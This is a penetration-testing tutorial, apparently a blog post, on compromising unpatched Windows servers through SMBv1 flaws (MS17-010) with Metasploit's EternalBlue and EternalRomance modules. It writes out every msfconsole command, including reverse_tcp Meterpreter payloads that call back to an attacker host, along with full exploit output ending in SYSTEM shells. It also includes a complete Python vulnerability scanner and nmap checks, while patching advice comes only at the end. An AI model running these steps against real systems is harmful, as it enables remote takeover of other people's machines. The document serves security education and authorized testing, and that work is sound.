Every so often a vulnerability or exploit makes headlines with a catchy name and impressive potential for damage. EternalBlue is one of those exploits. Originally attributed to the NSA, this former zero-day exploited a flaw in the SMB protocol that affected a huge number of Windows machines and caused havoc everywhere. Here we will use EternalBlue to exploit SMB via Metasploit.
What is EternalBlue?
EternalBlue is an exploit most likely developed by the NSA as a zero-day. It was released in 2017 by the Shadow Brokers, a hacker group known for leaking tools and exploits used by the Equation Group, which has possible ties to the NSA's Tailored Access Operations (TAO) unit.
EternalBlue targets the vulnerability Microsoft fixed in security bulletin MS17-010, and the two names are often used interchangeably. The flaw lives in the SMBv1 server of Microsoft's Server Message Block (SMB) protocol, which lets systems share access to files, printers, and other resources over the network. An attacker who can reach TCP port 445 needs no credentials: a null session (anonymous login) is enough to send the malformed packets that corrupt kernel memory and ultimately execute arbitrary code on the target.
EternalBlue was the propagation mechanism behind the WannaCry and NotPetya ransomware outbreaks and the EternalRocks worm; the closely related EternalRomance, covered below, drove Bad Rabbit.
Option 1: Use EternalBlue with Metasploit
We will be using an unpatched copy of Windows Server 2008 R2 as the target for the first part of this tutorial. An evaluation copy can be downloaded from Microsoft if you want to follow along.
Step 1: Find a module to use
The first thing we need to do is open a terminal and start Metasploit. Type service postgresql start to initialize the PostgreSQL database, if it is not already running, followed by msfconsole.

service postgresql start
msfconsole

Then use the search command within Metasploit to locate a suitable module. Searching on the bulletin name finds every module for this vulnerability:

search ms17_010
Matching Modules
================

   Name                                           Disclosure Date  Rank     Check  Description
   ----                                           ---------------  ----     -----  -----------
   auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
There is an auxiliary scanner, auxiliary/scanner/smb/smb_ms17_010, that we can run to determine whether a target is vulnerable to MS17-010. It is always a good idea to do this kind of reconnaissance first; note that the Check column reads No for the EternalBlue exploit modules themselves, so the exploit's own check command will not tell you anything, and the scanner is the way to find out. Otherwise you can waste a lot of time on a target that is not even vulnerable.
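To see what the scanner is actually asking the target, here is an added example of the same check in stdlib-only Python. It is my code, not the Metasploit module or the nmap script, but it re-implements the probe both of them use: open an anonymous SMBv1 session, connect to the IPC$ tree, and send a PeekNamedPipe transaction on file ID 0. An unpatched server answers STATUS_INSUFF_SERVER_RESOURCES (0xC0000205); a patched one answers STATUS_INVALID_HANDLE or STATUS_ACCESS_DENIED. Assumptions: the default target 10.10.0.101 is the lab address used in this tutorial, and the packet field values (buffer sizes, PID, flags) are ordinary SMBv1 client choices rather than anything the page specifies.

```python
"""MS17-010 exposure check, stdlib only (added example, not Metasploit's or nmap's code).

Probe: anonymous SMBv1 session -> tree connect IPC$ -> SMB_COM_TRANSACTION
PeekNamedPipe on FID 0.  Unpatched: STATUS_INSUFF_SERVER_RESOURCES.  Patched:
STATUS_INVALID_HANDLE / STATUS_ACCESS_DENIED.  A host that refuses the
"NT LM 0.12" dialect has SMBv1 off and is out of EternalBlue's reach entirely.
"""
import socket
import struct
import sys

SMB_COM_TRANSACTION, SMB_COM_NEGOTIATE = 0x25, 0x72
SMB_COM_SESSION_SETUP_ANDX, SMB_COM_TREE_CONNECT_ANDX = 0x73, 0x75
TRANS_PEEK_NMPIPE = 0x23
STATUS_INSUFF_SERVER_RESOURCES = 0xC0000205
STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED = 0xC0000008, 0xC0000022
HDR_FMT = "<4sBIBHH8sHHHHH"  # the 32-byte SMBv1 header, little-endian


def smb_header(command, status=0, tid=0, uid=0, mid=1):
    # Flags 0x18: case-insensitive, canonical paths.  Flags2 0x4001: 32-bit NT
    # status codes + long names; ASCII strings, no extended security.  PID is arbitrary.
    return struct.pack(HDR_FMT, b"\xffSMB", command, status, 0x18, 0x4001,
                       0, b"\x00" * 8, 0, tid, 0x1F4B, uid, mid)


def parse_header(data):
    f = struct.unpack_from(HDR_FMT, data, 0)
    return {"magic": f[0], "command": f[1], "status": f[2], "tid": f[8], "uid": f[10]}


def build_negotiate():
    dialects = b"\x02NT LM 0.12\x00"  # offer the SMBv1 dialect only
    return smb_header(SMB_COM_NEGOTIATE) + b"\x00" + struct.pack("<H", len(dialects)) + dialects


def build_session_setup():
    # 13 words: no AndX, MaxBuffer, MaxMpx, VcNumber, SessionKey, OEM password length 1
    # (a lone NUL = classic null session), Unicode password length 0, reserved,
    # capabilities CAP_NT_SMBS | CAP_STATUS32.
    words = struct.pack("<BBHHHHIHHII", 0xFF, 0, 0, 0xF000, 2, 1, 0, 1, 0, 0, 0x50)
    data = b"\x00" + b"\x00" * 4  # password, then empty account/domain/OS/LANMAN strings
    return (smb_header(SMB_COM_SESSION_SETUP_ANDX) + b"\x0d" + words
            + struct.pack("<H", len(data)) + data)


def build_tree_connect(host, uid):
    words = struct.pack("<BBHHH", 0xFF, 0, 0, 0, 1)  # 4 words, password length 1
    data = b"\x00" + f"\\\\{host}\\IPC$".encode() + b"\x00" + b"?????\x00"
    return (smb_header(SMB_COM_TREE_CONNECT_ANDX, uid=uid, mid=2) + b"\x04" + words
            + struct.pack("<H", len(data)) + data)


def build_peek_named_pipe(tid, uid):
    name = b"\\PIPE\\\x00"
    off = 32 + 1 + 32 + 2 + len(name)  # header + word count + 16 words + byte count + name
    # 16 words: counts/limits, flags, timeout, parameter/data offsets, setup count,
    # then the two setup words: subcommand PeekNamedPipe and FID 0.
    words = struct.pack("<HHHHBBHIHHHHHBBHH", 0, 0, 0xFFFF, 0xFFFF, 0xFF, 0, 0, 0, 0,
                        0, off, 0, off, 2, 0, TRANS_PEEK_NMPIPE, 0)
    return (smb_header(SMB_COM_TRANSACTION, tid=tid, uid=uid, mid=3) + b"\x10" + words
            + struct.pack("<H", len(name)) + name)


def classify(status):
    if status == STATUS_INSUFF_SERVER_RESOURCES:
        return "VULNERABLE: MS17-010 not applied"
    if status in (STATUS_INVALID_HANDLE, STATUS_ACCESS_DENIED):
        return "PATCHED: MS17-010 applied"
    return f"UNKNOWN: NT status 0x{status:08X}"


def _recv_exact(sock, n):
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed the connection")
        buf += chunk
    return buf


def nb_send(sock, smb):
    sock.sendall(struct.pack(">I", len(smb)) + smb)  # NetBIOS session message framing
    return _recv_exact(sock, int.from_bytes(_recv_exact(sock, 4)[1:], "big"))


def check_host(host, port=445, timeout=5.0):
    with socket.create_connection((host, port), timeout=timeout) as s:
        try:
            raw = nb_send(s, build_negotiate())
        except OSError:  # reset, closed, or timed out: no SMBv1 negotiate at all
            return "NOT EXPOSED: SMBv1 dialect refused (SMBv1 disabled or filtered)"
        if (len(raw) < 35 or raw[:4] != b"\xffSMB" or parse_header(raw)["status"] != 0
                or raw[33:35] == b"\xff\xff"):  # DialectIndex 0xFFFF = none accepted
            return "NOT EXPOSED: SMBv1 dialect refused (SMBv1 disabled)"
        sess = parse_header(nb_send(s, build_session_setup()))
        if sess["status"] != 0:
            return f"UNKNOWN: null session rejected (0x{sess['status']:08X})"
        tree = parse_header(nb_send(s, build_tree_connect(host, sess["uid"])))
        if tree["status"] != 0:
            return f"UNKNOWN: IPC$ tree connect failed (0x{tree['status']:08X})"
        peek = parse_header(nb_send(s, build_peek_named_pipe(tree["tid"], sess["uid"])))
        return classify(peek["status"])


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "10.10.0.101"  # lab target from this tutorial
    print(f"{target}: {check_host(target)}")
```

Run it as python3 ms17_010_check.py 10.10.0.101 against a host you are authorized to test. It does not exploit anything, but the null session and the IPC$ tree connect are exactly what an SMB audit log or IDS signature for MS17-010 scanning keys on, so expect to be noticed. The NOT EXPOSED branch is the one you want to see after remediation: once SMBv1 is disabled, the server never accepts the dialect and none of the exploits in this family can even start.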
Once we have determined that our target really is vulnerable to EternalBlue, we can load the exploit module with the use command:

use exploit/windows/smb/ms17_010_eternalblue

You know you're good if the prompt changes to exploit(windows/smb/ms17_010_eternalblue) >. Type options to see the module's settings:

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target address range or CIDR identifier
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs
First, we need to enter the target's IP address.
set rhosts 10.10.0.101
rhosts => 10.10.0.101
Next, we can load the trusty reverse_tcp Meterpreter shell as the payload.

set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

Then set the local host, the address of our attacking machine that the shell will connect back to.

set lhost 10.10.0.1
lhost => 10.10.0.1
And the listening port to a suitable number.
set lport 4321
lport => 4321
That should be everything, so the only thing left is to launch the exploit. Type run to kick it off.
[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.101:445 - Connecting to target for exploitation.
[+] 10.10.0.101:445 - Connection established for exploitation.
[+] 10.10.0.101:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.0.101:445 - CORE raw buffer dump (51 bytes)
[*] 10.10.0.101:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 10.10.0.101:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 10.10.0.101:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 10.10.0.101:445 - 0x00000030  6b 20 31                                         k 1
[+] 10.10.0.101:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.0.101:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.0.101:445 - Sending all but last fragment of exploit packet
[*] 10.10.0.101:445 - Starting non-paged pool grooming
[+] 10.10.0.101:445 - Sending SMBv2 buffers
[+] 10.10.0.101:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.0.101:445 - Sending final SMBv2 buffers.
[*] 10.10.0.101:445 - Sending last fragment of exploit packet!
[*] 10.10.0.101:445 - Receiving response from exploit packet
[+] 10.10.0.101:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.0.101:445 - Sending egg to corrupted connection.
[*] 10.10.0.101:445 - Triggering free of corrupted buffer.
[*] Sending stage (206403 bytes) to 10.10.0.101
[*] Meterpreter session 1 opened (10.10.0.1:4321 -> 10.10.0.101:49207) at 2019-03-26 11:01:46 -0500
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.0.101:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
We can see a few things happening here: the SMB connection is established, the non-paged pool is groomed, and the exploit packet is sent. Finally we see a "WIN" and a Meterpreter session opens. Sometimes this exploit won't complete successfully on the first attempt, so if it doesn't, just run it again and it usually goes through.
We can verify that we have compromised the target by running commands like sysinfo to obtain operating system information.
Computer        : SO2
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : DLAB
Logged On Users : 2
Meterpreter     : x64/windows
and getuid to get the current username.
Server username: NT AUTHORITY\SYSTEM

This exploit doesn't work well on newer systems, and in some cases it can crash the target machine: it works by corrupting the kernel pool, so a failed attempt may blue-screen the host instead of quietly failing. Keep that in mind before running it against anything you can't afford to reboot.
Option 2: EternalRomance/EternalSynergy/EternalChampion
As if EternalBlue wasn't devastating enough, three similar exploits were developed after it. EternalRomance and EternalSynergy exploit a type confusion (CVE-2017-0143), while EternalChampion and EternalSynergy exploit a race condition (CVE-2017-0146).
These were combined into a single Metasploit module that also uses the classic psexec technique to run the payload. It is considered more reliable than EternalBlue, less likely to crash the target, and works on all unpatched versions of Windows up to Server 2016 and Windows 10.
The only catch is that this exploit requires a named pipe. Named pipes provide a method for running processes to communicate with one another, usually appearing as a file that other processes can attach to. The Metasploit module automatically checks a wordlist of common pipe names and picks one it can open over the anonymous session, which makes it pretty straightforward to use as long as such a pipe is present on the target.
Step 1: Find a Vulnerable Target
We can use Nmap as an alternative to the Metasploit scanner to discover whether a target is vulnerable to EternalBlue. The Nmap Scripting Engine (NSE) is a powerful feature of the core tool that allows all kinds of scripts to be run against a target.
Here we use the script smb-vuln-ms17-010 to check for the vulnerability. Our target will be an unpatched copy of Windows Server 2016 Datacenter. Evaluation copies can be downloaded from Microsoft if you want to follow along.
We can specify a single script to run with the --script option, along with the -v flag for verbosity and our target's IP address. First drop back to a regular shell (exit msfconsole) if you are still in it.

nmap --script smb-vuln-ms17-010 -v 10.10.0.100

Nmap starts up and shouldn't take too long, since we are only running one script against one host. At the end of the output we find the results.

Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-26 11:05 CDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:05
...
Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

NSE: Script Post-scanning.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.31 seconds
           Raw packets sent: 1181 (51.948KB) | Rcvd: 1001 (40.060KB)
We can see it lists the target as vulnerable, along with additional information such as the risk factor and links to the CVE and Microsoft's guidance.
Now that we know the target is vulnerable, we can go back into Metasploit and search for an appropriate exploit.

msfconsole
search eternalromance
Matching Modules
================

   Name                                  Disclosure Date  Rank    Check  Description
   ----                                  ---------------  ----    -----  -----------
   auxiliary/admin/smb/ms17_010_command  2017-03-14       normal  Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   exploit/windows/smb/ms17_010_psexec   2017-03-14       normal  No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
Load the exploit module with the use command.

use exploit/windows/smb/ms17_010_psexec

You know you're good if the prompt changes to exploit(windows/smb/ms17_010_psexec) >.
Let's take a look at our options:
Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to (leave blank for auto)
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                                yes       The target address range or CIDR identifier
   RPORT                 445                                                             yes       The target port
   SERVICE_DESCRIPTION                                                                   no        Service description to be used on target for pretty listing
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as

Exploit target:

   Id  Name
   --  ----
   0   Automatic
So this module works through a wordlist of named pipes, checking each until it finds one it can connect to. We can leave all of that at the defaults for now, but we do have to set the remote host.
set rhosts 10.10.0.100
rhosts => 10.10.0.100
Then the reverse shell payload and the local host, the same ones used in Option 1.

set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

set lhost 10.10.0.1
lhost => 10.10.0.1

And finally the local port.
set lport 4321
lport => 4321
We should be good to go now. Type run to start the exploit.

[*] Started reverse TCP handler on 10.10.0.1:4321
[*] 10.10.0.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393
[*] 10.10.0.100:445 - Built a write-what-where primitive...
[+] 10.10.0.100:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.0.100:445 - Selecting PowerShell target
[*] 10.10.0.100:445 - Executing the payload...
[+] 10.10.0.100:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (206403 bytes) to 10.10.0.100
[*] Meterpreter session 2 opened (10.10.0.1:4321 -> 10.10.0.100:49965) at 2019-03-26 11:12:30 -0500
We can see the module build its write-what-where primitive, obtain a SYSTEM session, and execute the payload, and we end up with a Meterpreter session.
Again, we can verify that we have compromised the system with commands like sysinfo .
Computer        : DC01
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : DLAB
Logged On Users : 4
Meterpreter     : x64/windows
and getuid .
Server username: NT AUTHORITY\SYSTEM
Prevention and Current Status
Despite all the damage EternalBlue has caused, there is a reliable way to prevent this whole class of exploits: patch your systems. Apply the MS17-010 update, and disable SMBv1 wherever nothing still depends on it, since every exploit in this family needs the SMBv1 server to accept a connection; blocking TCP port 445 from untrusted networks closes off the rest. At this point, almost two years after these vulnerabilities were disclosed, there is really no excuse for running outdated operating systems.
However, EternalBlue continues to be a problem, and although the consequences are ugly, some organizations will unfortunately still be running unpatched systems. That, combined with pirated versions of Windows that never receive updates, keeps EternalBlue a significant threat to this day.
Cryptojacking, which secretly uses a victim's computer to mine cryptocurrency, is another threat vector that relies on EternalBlue to spread. WannaMine was one such outbreak that hijacked computers around the world in 2018.
Today we learned about EternalBlue and how to use it with Metasploit. We also learned about a related exploit that is more reliable than EternalBlue and works on more systems. In the next tutorial we will dig a little deeper and learn how to exploit EternalBlue manually, which is much more satisfying in the end.